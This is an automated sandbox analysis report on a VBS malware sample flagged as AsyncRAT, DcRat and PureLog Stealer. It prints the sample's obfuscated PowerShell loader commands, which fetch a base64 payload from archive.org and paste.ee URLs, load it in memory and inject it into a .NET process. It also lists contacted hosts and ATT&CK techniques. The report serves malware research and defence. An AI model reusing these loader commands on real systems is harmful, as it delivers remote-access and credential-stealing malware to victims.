Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcaojzknkydqrhvybca9ihynkydlnwh0jysndccrj3ankydzoi8vawe2mccrjzaxmdaudxmuyscrj3jjaccrj2l2zs5vjysncmcvmicrjzqvaxrlbxmvzgv0yscrj2gtjysnbm90zs12l0qnkydldgfojysntm90zvyudhh0jysndmu1oycrjzlqrgjhc2u2nenvjysnbnqnkydlbnqnkycgpsaoticrj2v3lu9iaicrj2vjjysndcbtexmnkyd0zw0nkycujysntmv0lldlyknsawvudckurg93bmwnkydvywrtjysndhinkydpbmcoowpedxinkydsjysnkts5akrijysnaw5hjysncnknkyddjysnb250zw50id0gjysnw1n5cycrj3rlbs4nkyddb252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0cicrj2knkyduzygnkyc5jysnakriyxnlnjrdb24nkyd0zw4nkyd0kts5akrhc3nlbwjsesa9iftsjysnzwzszwn0jysnaw9ulkfzc2vtymwnkyd5xto6tg9hzcg5akqnkydiaw4nkydhcnldb24nkyd0zw4nkyd0kts5akqnkyd0exblid0goscrj2peyxnzzw1ijysnbhkur2v0jysnvhknkydwzsh2ztvsdw5qrs5ib21ldicrj2u1kts5jysnakqnkydtzxrob2qgpsa5aicrj0r0jysnexankydllkdlde1ldghvzch2ztvwqul2ztupozlqrg1ldccrj2hvzc4nkydjbnynkydvjysna2uoowpebnvsbccrjywgw29iamvjdccrj1snkyddxuaodmu1mc9nticrj1rhjysnqs9kl2vllmv0c2fwly86c3b0jysndggnkyd2ztuglcb2ztvkzxmnkydhdgl2ywrvdmu1icwgdmu1zgvzyxrpjysndmfkb3zlnsankycsiccrj3zlnwrlc2f0axynkydhzg92jysnztusdmunkyc1qwrksw4nkydqcicrj29jzscrj3nzmzj2ztusdmu1dmu1jysnkscrjyknks5szvbsyunlkcc5akqnlftzdhjjtkddw0noqvjdmzyplljlugxhq2uoj3zlnscsw3n0cklor11bq2hbul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex( ('9'+'jdurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/d'+'etah'+'notev.txt'+'ve5;'+'9jdbase64co'+'nt'+'ent'+' = (n'+'ew-obj'+'ec'+'t sys'+'tem'+'.'+'net.webclient).downl'+'oads'+'tr'+'ing(9jdur'+'l'+');9jdb'+'ina'+'ry'+'c'+'ontent = '+'[sys'+'tem.'+'convert]::from'+'ba'+'se64str'+'i'+'ng('+'9'+'jdbase64con'+'ten'+'t);9jdassembly = [r'+'eflect'+'ion.assembl'+'y]::load(9jd'+'bin'+'arycon'+'ten'+'t);9jd'+'type = 9'+'jdassemb'+'ly.get'+'ty'+'pe(ve5runpe.homev'+'e5);9'+'jd'+'method = 9j'+'dt'+'yp'+'e.getmethod(ve5vaive5);9jdmet'+'hod.'+'inv'+'o'+'ke(9jdnull'+', [object'+'['+']]@(ve50/mn'+'ta'+'a/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5addin'+'pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').replace('9jd',[string][char]36).replace('ve5',[string][char]39) )"	Jump to behavior

Source: AddInProcess32.exe, 00000005.00000002.3468761215.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.0000000002878000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.000000000286F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: AddInProcess32.exe, 00000005.00000002.3468761215.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.0000000002878000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.000000000286F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe
Source: AddInProcess32.exe, 00000005.00000002.3468761215.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.0000000002878000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.000000000286F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

Source: powershell.exe, 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: AddInProcess32.exe, 00000005.00000002.3478081963.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: AddInProcess32.exe, 00000005.00000002.3467886698.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3478140897.0000000004DBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected DcRat

Source: Yara match	File source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.powershell.exe.219a7700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2199fcf01f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.219a7700000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2199fcf01f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2297059905.00000219A7700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2274321947.000002199F4DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DcRat

Source: Yara match	File source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.powershell.exe.219a7700000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2199fcf01f0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.219a7700000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2199fcf01f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2297059905.00000219A7700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2274321947.000002199F4DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	212 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	1 Scheduled Task/Job	121 Obfuscated Files or Information	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Command and Scripting Interpreter	Login Hook	Login Hook	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	3 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	212 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1iH5ABLKIA.vbs	5%	ReversingLabs	Win32.Trojan.Generic
1iH5ABLKIA.vbs	8%	Virustotal		Browse

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
ia600100.us.archive.org	0%	Virustotal	Browse
paste.ee	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://analytics.paste.ee	1%	Virustotal		Browse
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://paste.ee	1%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://paste.ee	1%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
ia600100.us.archive.org	207.241.227.240	true	false	0%, Virustotal, Browse	unknown
paste.ee	188.114.96.3	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt	false		unknown
https://paste.ee/d/AaTNM/0	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content	powershell.exe, 00000004.00000002.2257689988.000002198F0E2000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2257689988.000002199091E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://paste.ee	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000004.00000002.2257689988.000002199009B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia600100.us.arX	powershell.exe, 00000004.00000002.2257689988.0000021990282000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://analytics.paste.ee	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://paste.ee	powershell.exe, 00000004.00000002.2257689988.000002198F307000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2309802414.000002015101B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.google.com	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2257689988.000002199091E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee;	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ia600100.us.archive.org	powershell.exe, 00000004.00000002.2257689988.000002198F0E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.0000021990282000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2309802414.000002015106E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198EEC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdnjs.cloudflare.com;	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2309802414.000002015109D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198EEC1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.gravatar.com	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://themes.googleusercontent.com	powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://oneget.org	powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ia600100.us.archive.org	powershell.exe, 00000004.00000002.2257689988.0000021990578000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
148.113.165.11	unknown	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
188.114.96.3	paste.ee	European Union	13335	CLOUDFLARENETUS	true
207.241.227.240	ia600100.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523828
Start date and time:	2024-10-02 05:27:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1iH5ABLKIA.vbs renamed because original name is a hash value
Original Sample Name:	524b71c4013215761e79452ecd84fecf4ee101bd2011d2d95e604a566db996af.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@8/7@2/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 16 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 2.19.126.154, 2.19.126.137
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4000 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:28:14	API Interceptor	40x Sleep call for process: powershell.exe modified
23:28:23	API Interceptor	1x Sleep call for process: AddInProcess32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
148.113.165.11	INV04105025.vbs	Get hash	malicious	Unknown	Browse	148.113.165.11/document
188.114.96.3	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
207.241.227.240	vr65co3Boo.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse
	f4576JaIo9.vbs	Get hash	malicious	PureLog Stealer	Browse
	89SkYNNpdi.vbs	Get hash	malicious	AveMaria, PrivateLoader, PureLog Stealer	Browse
	qiEmGNhUij.vbs	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer	Browse
	ZJbugHcHda.vbs	Get hash	malicious	PureLog Stealer	Browse
	0BO4n723Q8.vbs	Get hash	malicious	PureLog Stealer	Browse
	PofaABvatI.vbs	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf	Get hash	malicious	PureLog Stealer	Browse
	RFQ 2024.09.26-89 vivecta.vbs	Get hash	malicious	PureLog Stealer	Browse
	AGMETIGA zapytanie ofertowe.xls	Get hash	malicious	PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.elightsailorsbank.uksfholdings.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://sanbernardinoscounty.telcom-info.com/	Get hash	malicious	HtmlDropper	Browse	199.232.210.172
